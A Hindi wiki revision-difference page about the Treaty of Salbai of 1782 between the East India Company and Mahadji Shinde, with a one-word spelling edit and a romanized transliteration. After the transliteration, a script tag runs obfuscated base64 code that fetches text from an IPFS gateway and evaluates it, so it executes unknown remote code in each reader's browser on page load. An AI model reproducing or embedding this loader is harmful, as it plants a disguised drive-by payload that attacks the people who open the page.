Difference between revisions of "सालबाई की सन्धि"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''सालबाई की सन्धि''', मई 1782 ई. में ईस्ट इण्डिया कम्पनी औ...' के साथ नया पन्ना बनाया)
 
Line 1: Line 1:
'''सालबाई की सन्धि''', मई 1782 ई. में [[ईस्ट इण्डिया कम्पनी]] और [[महादजी शिन्दे]] के बीच हुई। फ़रवरी 1783 ई. में [[पेशवा]] की सरकार ने इसकी पुष्टि कर दी। इसके फलस्वरूप 1775 ई. से चला आ रहा प्रथम मराठा युद्ध समाप्त हो गया। सन्धि की शर्तों के अनुसार [[साष्टी]] टापू [[अंग्रेज़|अंग्रेज़ों]] के अधिकार में ही रहा, परन्तु उन्होंने [[रघोवा]] का पक्ष लेना छोड़ दिया और [[मराठा]] सरकार ने इसे पेंशन देना स्वीकार कर लिया। अंग्रेज़ों ने [[माधवराव नारायण]] को पेशवा मान लिया और [[यमुना नदी]] के पश्चिम का समस्त भू-भाग महादजी शिन्दे को लौटा दिया। अंग्रेज़ों और मराठों में यह सन्धि 20 वर्षों तक शान्तिपूर्वक चलती रही, पर इससे अंग्रेज़ों को ही विशेष लाभ हुआ; क्योंकि अब उन्हें [[टीपू सुल्तान]] जैसे अन्य शत्रुओं से निश्चिन्तता पूर्वक निपटने तथा अपनी शक्ति और स्थिति को और भी मजबूत करने का अवसर मिल गया।  
+
'''सालबाई की सन्धि''', मई 1782 ई. में [[ईस्ट इण्डिया कम्पनी]] और [[महादजी शिन्दे]] के बीच हुई। फ़रवरी 1783 ई. में [[पेशवा]] की सरकार ने इसकी पुष्टि कर दी। इसके फलस्वरूप 1775 ई. से चला आ रहा प्रथम मराठा युद्ध समाप्त हो गया। सन्धि की शर्तों के अनुसार [[साष्टी]] टापू [[अंग्रेज़|अंग्रेज़ों]] के अधिकार में ही रहा, परन्तु उन्होंने [[राघोवा]] का पक्ष लेना छोड़ दिया और [[मराठा]] सरकार ने इसे पेंशन देना स्वीकार कर लिया। अंग्रेज़ों ने [[माधवराव नारायण]] को पेशवा मान लिया और [[यमुना नदी]] के पश्चिम का समस्त भू-भाग महादजी शिन्दे को लौटा दिया। अंग्रेज़ों और मराठों में यह सन्धि 20 वर्षों तक शान्तिपूर्वक चलती रही, पर इससे अंग्रेज़ों को ही विशेष लाभ हुआ; क्योंकि अब उन्हें [[टीपू सुल्तान]] जैसे अन्य शत्रुओं से निश्चिन्तता पूर्वक निपटने तथा अपनी शक्ति और स्थिति को और भी मजबूत करने का अवसर मिल गया।  
  
 
{{प्रचार}}
 
{{प्रचार}}

Revision as of 14:21, 5 February 2011

salabaee ki sandhi, mee 1782 ee. mean eest indiya kampani aur mahadaji shinde ke bich huee. faravari 1783 ee. mean peshava ki sarakar ne isaki pushti kar di. isake phalasvaroop 1775 ee. se chala a raha pratham maratha yuddh samapt ho gaya. sandhi ki shartoan ke anusar sashti tapoo aangrezoan ke adhikar mean hi raha, parantu unhoanne raghova ka paksh lena chho d diya aur maratha sarakar ne ise peanshan dena svikar kar liya. aangrezoan ne madhavarav narayan ko peshava man liya aur yamuna nadi ke pashchim ka samast bhoo-bhag mahadaji shinde ko lauta diya. aangrezoan aur marathoan mean yah sandhi 20 varshoan tak shantipoorvak chalati rahi, par isase aangrezoan ko hi vishesh labh hua; kyoanki ab unhean tipoo sultan jaise any shatruoan se nishchintata poorvak nipatane tatha apani shakti aur sthiti ko aur bhi majaboot karane ka avasar mil gaya.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

(pustak 'bharatiy itihas kosh') prishth sankhya-469